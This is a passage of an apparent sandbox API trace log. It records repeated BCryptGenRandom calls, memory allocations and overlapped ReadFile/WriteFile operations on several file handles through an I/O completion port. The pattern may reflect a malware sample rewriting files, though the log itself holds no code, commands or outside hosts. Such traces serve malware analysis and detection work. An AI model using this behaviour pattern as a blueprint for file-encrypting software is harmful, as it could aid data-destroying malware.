lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.688] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.688] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.688] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.700] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x134, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.700] CloseHandle (hObject=0x2a8) returned 1 [0205.700] free (_Block=0x1ff1e60) [0205.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.719] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.719] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0205.720] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.720] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0205.720] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.720] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.720] free (_Block=0x3e305b8) [0205.720] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.721] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.721] free (_Block=0x1fa91d0) [0205.721] free (_Block=0x1fa2ed8) [0205.721] free (_Block=0x1fa90b8) [0205.721] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.722] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.722] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.733] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x27d, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0205.759] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0206.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0206.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0206.018] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0206.018] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0206.018] free (_Block=0x3e305b8) [0206.018] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0206.018] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0206.018] free (_Block=0x1fa91d0) [0206.019] free (_Block=0x1fa2ed8) [0206.019] free (_Block=0x1fa90b8) [0206.019] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0206.019] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0206.033] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1f3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0206.033] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0206.041] CloseHandle (hObject=0x3cc) returned 1 [0206.042] free (_Block=0x3df0008) [0206.042] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0206.043] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0206.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0206.078] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0206.078] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0206.079] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0206.079] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0206.079] free (_Block=0x3e305b8) [0206.079] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0206.079] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0206.079] free (_Block=0x1fa91d0) [0206.079] free (_Block=0x1fa2ed8) [0206.079] free (_Block=0x1fa90b8) [0206.079] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0206.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0206.080] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0206.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0206.081] CloseHandle (hObject=0x338) returned 1 [0206.081] free (_Block=0x1ff1e60) [0206.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.333] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0209.334] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0209.334] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.334] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.334] free (_Block=0x3e305b8) [0209.334] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.334] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.334] free (_Block=0x1fa91d0) [0209.334] free (_Block=0x1fa2ed8) [0209.335] free (_Block=0x1fa90b8) [0209.335] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.335] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.337] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x220, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.338] CloseHandle (hObject=0x2a8) returned 1 [0209.338] free (_Block=0x3e70008) [0209.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0209.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0209.514] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.514] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.514] free (_Block=0x3e305b8) [0209.514] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.514] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.514] free (_Block=0x1fa91d0) [0209.514] free (_Block=0x1fa2ed8) [0209.514] free (_Block=0x1fa90b8) [0209.514] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0209.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.515] CloseHandle (hObject=0x338) returned 1 [0209.515] free (_Block=0x1ff1e60) [0209.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.516] CloseHandle (hObject=0x170) returned 1 [0209.516] free (_Block=0x3df0008) [0209.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.576] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xb04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0209.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.577] CloseHandle (hObject=0x2a8) returned 1 [0209.577] free (_Block=0x3f70048) [0209.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0209.650] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0209.650] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.650] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.650] free (_Block=0x3e305b8) [0209.650] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.650] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.650] free (_Block=0x1fa91d0) [0209.651] free (_Block=0x1fa2ed8) [0209.651] free (_Block=0x1fa90b8) [0209.651] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.667] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0209.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0209.668] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.668] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.668] free (_Block=0x3e305b8) [0209.668] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.668] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.668] free (_Block=0x1fa91d0) [0209.668] free (_Block=0x1fa2ed8) [0209.668] free (_Block=0x1fa90b8) [0209.668] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.669] CloseHandle (hObject=0x308) returned 1 [0209.669] free (_Block=0x3df0008) [0209.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.669] CloseHandle (hObject=0x2a8) returned 1 [0209.669] free (_Block=0x1ff1e60) [0209.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0209.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.671] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0209.671] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.671] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.671] free (_Block=0x3e305b8) [0209.671] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.671] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.671] free (_Block=0x1fa91d0) [0209.671] free (_Block=0x1fa2ed8) [0209.671] free (_Block=0x1fa90b8) [0209.671] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0209.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.672] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0209.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.708] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x901, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.708] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.729] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1a15, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0209.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0209.752] CloseHandle (hObject=0x308) returned 1 [0209.752] free (_Block=0x3d70450) [0209.752] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0210.080] CloseHandle (hObject=0x238) returned 1 [0210.080] free (_Block=0x3df0008) [0210.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0210.113] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.114] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0210.114] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.114] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0210.114] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.115] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.115] free (_Block=0x3e305b8) [0210.115] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.115] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.115] free (_Block=0x1fa91d0) [0210.115] free (_Block=0x1fa2ed8) [0210.115] free (_Block=0x1fa90b8) [0210.115] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.115] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0210.190] CloseHandle (hObject=0x308) returned 1 [0210.191] free (_Block=0x3d70450) [0210.191] GetQueuedCompletionStatus (in: 